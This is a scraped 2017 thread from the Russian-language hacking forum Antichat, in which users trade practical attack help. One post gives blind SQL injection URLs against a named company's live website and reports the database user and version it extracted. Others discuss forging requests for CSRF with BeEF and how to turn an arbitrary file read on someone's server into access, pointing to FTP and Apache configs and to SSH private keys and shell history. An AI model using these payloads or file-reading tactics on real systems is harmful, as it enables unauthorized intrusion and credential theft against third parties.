ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

05.02.2017, 19:07
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме: 1668307
Репутация:
114
|
|
Сообщение от Octavian
Octavian said:
↑
В скулмап ктото засунет . интересно что он скажет
слепая скуля, потому вывода нет.
Код:
Code:
http://iucosoft.com/software-development-details.html?place=desktop%27%20AND%20substring(user(),8,1)=%27t
Код:
Code:
http://iucosoft.com/software-development-details.html?place=desktop%27%20AND%20substring(version(),7,1)=%27-
user() = iucosoft
version() = 5.5.40-(дальше не докрутил) в ручную подбирал с телефона
|
|
|

05.02.2017, 20:15
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
Сообщение от Elva
Elva said:
↑
Задача
Подделать PUT запрос с целью проведения CSRF атаки.
Токен скорее всего проверяется, но всякое бывает. Для отправки PUT можно воспользоваться Burp-ом, для проведения атаки XMLHttpRequest.
Сообщение от Elva
Elva said:
↑
2. Кто может помочь включить BeEF ?
Попробуй подробно написать на гитхабе https://github.com/beefproject/beef/issues, возможно помогут.
|
|
|
|

06.02.2017, 16:14
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
-5
|
|
Что можно сделать с локальной читалкой в гете при условии что конфиг к бд php формата и прочитать его соответственно не получается? Можно что то такое прочитать, что помогло бы получить доступ?
|
|
|
|

06.02.2017, 17:32
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
Сообщение от Nikolaz
Nikolaz said:
↑
Что можно сделать с локальной читалкой в гете при условии что конфиг к бд php формата и прочитать его соответственно не получается? Можно что то такое прочитать, что помогло бы получить доступ?
Может у тебя локальный инклуд?
|
|
|
|

06.02.2017, 19:38
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
-5
|
|
Сообщение от crlf
crlf said:
↑
Может у тебя локальный инклуд?
У меня file_get_contents() а не include() . Читать ток могу
|
|
|
|

06.02.2017, 19:53
|
|
Guest
Сообщений: n/a
Провел на форуме: 300820
Репутация:
90
|
|
Сообщение от Nikolaz
Nikolaz said:
↑
У меня file_get_contents() а не include() . Читать ток могу
тогда php файлы должны читаться, может прав не хватать, index.php например читается?
|
|
|
|

06.02.2017, 20:15
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
-5
|
|
Сообщение от t0ma5
t0ma5 said:
↑
тогда php файлы должны читаться, может прав не хватать, index.php например читается?
Благодарю, не знал. Но прав не хватает... Нужны еще варианты помимо конфига от бд. Можно системное что нибудь прочитать что позволит получить доступ? Ссх клиент там, и прочую лабуду
|
|
|
|

06.02.2017, 20:23
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от Nikolaz
Nikolaz said:
↑
Благодарю, не знал. Но прав не хватает... Нужны еще варианты помимо конфига от бд. Можно системное что нибудь прочитать что позволит получить доступ? Ссх клиент там, и прочую лабуду
ну для ssh пассы в открытом виде еще со времен мамонтов не было, попробуй файлы конфигов фтп, апача
|
|
|

06.02.2017, 20:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 300820
Репутация:
90
|
|
Сообщение от Gorev
Gorev said:
↑
ну для ssh пассы в открытом виде еще со времен мамонто не было, попробуй файлы конфигов фтп, апача
иногда случается... недавно видел один хост, на котором из под www-data читались /home/user/.ssh/id_rsa /home/user/.bash_history
|
|
|
|

06.02.2017, 20:42
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от t0ma5
t0ma5 said:
↑
иногда случается... недавно видел один хост, на котором из под www-data читались /home/user/.ssh/id_rsa /home/user/.bash_history
ну это крайне редкое исключение из правил, обычно из под www не большой выбор
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|